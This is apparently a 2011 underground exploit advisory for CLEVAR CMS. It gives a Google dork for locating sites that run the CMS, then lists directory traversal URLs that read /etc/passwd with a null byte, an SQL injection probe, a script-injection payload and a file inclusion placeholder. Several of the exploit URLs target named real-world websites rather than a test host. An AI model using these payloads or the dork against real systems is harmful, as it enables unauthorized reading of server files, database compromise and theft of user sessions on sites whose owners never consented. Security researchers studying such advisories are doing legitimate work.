# Name: CLEVAR CMS Multiple Vulnerabilities # Web Site: http://www.teacharabia.com/ # Google Dork: intext:"Powered By CLEVAR" # Type: PHP # Date: 04/Dec/2011 # Author: Mr.XHat # Discovered By: Mr.XHat # Tested On: Apache/2.2.3 (CentOS) ################################## # Vulnerablity: Directory Traversal # Impact: By exploiting directory traversal vulnerabilities, attackers step out of the root directory and access files in other directories. As a result, attackers might view restricted files or execute commands, leading to a full compromise of the Web server. # Demo: http://localhost/?module=[Directory Traversal]&page=lexisnexis_en http://localhost/?module=rss&page=[Directory Traversal] http://localhost/index.php?action=[Directory Traversal]&lang=ar&module=forms http://localhost/index.php?module=[Directory Traversal]&page=appointment http://localhost/index.php?module=forms&page=[Directory Traversal] # Exploit: http://elyzee.com.sa/?module=../../../../../../../../../../etc/passwd%00.png&page=lexisnexis_en http://elyzee.com.sa/?module=rss&page=../../../../../../../../../../etc/passwd%00.png http://elyzee.com.sa/index.php?action=../../../../../../../../../../etc/passwd%00.png&lang=ar&module=forms http://elyzee.com.sa/index.php?module=../../../../../../../../../../etc/passwd%00.png&page=appointment http://elyzee.com.sa/index.php?module=forms&page=../../../../../../../../../../etc/passwd%00.png ################################################################################################ # Vulnerablity: SQL Injection # Impact: An attacker may execute arbitrary SQL statements on the vulnerable system. This may compromise the integrity of your database and/or expose sensitive information. Depending on the back-end database in use, SQL injection vulnerabilities lead to varying levels of data/system access for the attacker. It may be possible to not only manipulate existing queries, but to UNION in arbitrary data, use subselects, or append additional queries. In some cases, it may be possible to read in or write out to files, or to execute shell commands on the underlying operating system. Certain SQL Servers such as Microsoft SQL Server contain stored and extended procedures (database server functions). If an attacker can obtain access to these procedures it may be possible to compromise the entire machine. # Demo: http://www.hiel.com.sa/index.php?module=search&page=en_result&search=1' # Exploit: http://localhost/index.php?module=search&page=en_result&search=[SQLI] ####################################################################### # Vulnerability: Cross Site Scripting # Impact: Malicious users may inject JavaScript, VBScript, ActiveX, HTML or Flash into a vulnerable application to fool a user in order to gather data from them. An attacker can steal the session cookie and take over the account, impersonating the user. It is also possible to modify the content of the page presented to the user. # Demo: http://localhost/index.php?module=search&page=en_result&search=[XSS] # Exploit: http://www.hiel.com.sa/index.php?module=search&page=en_result&search="<script>alert("XSS")</script>" #################################################################################################### # Vulnerability: File Inclusion # Impact: It is possible for a remote attacker to include a file from local or remote resources and/or execute arbitrary script code with the privileges of the webserver. # Demo: http://localhost/index.php?module=search&page=[LFI]&search # Exploit: http://www.southeagle.com.sa/index.php?module=search&page=[LFI]&search ###################################################################### Greets To: Inj3ct0r Team (1337day.com) And All Underground Hackers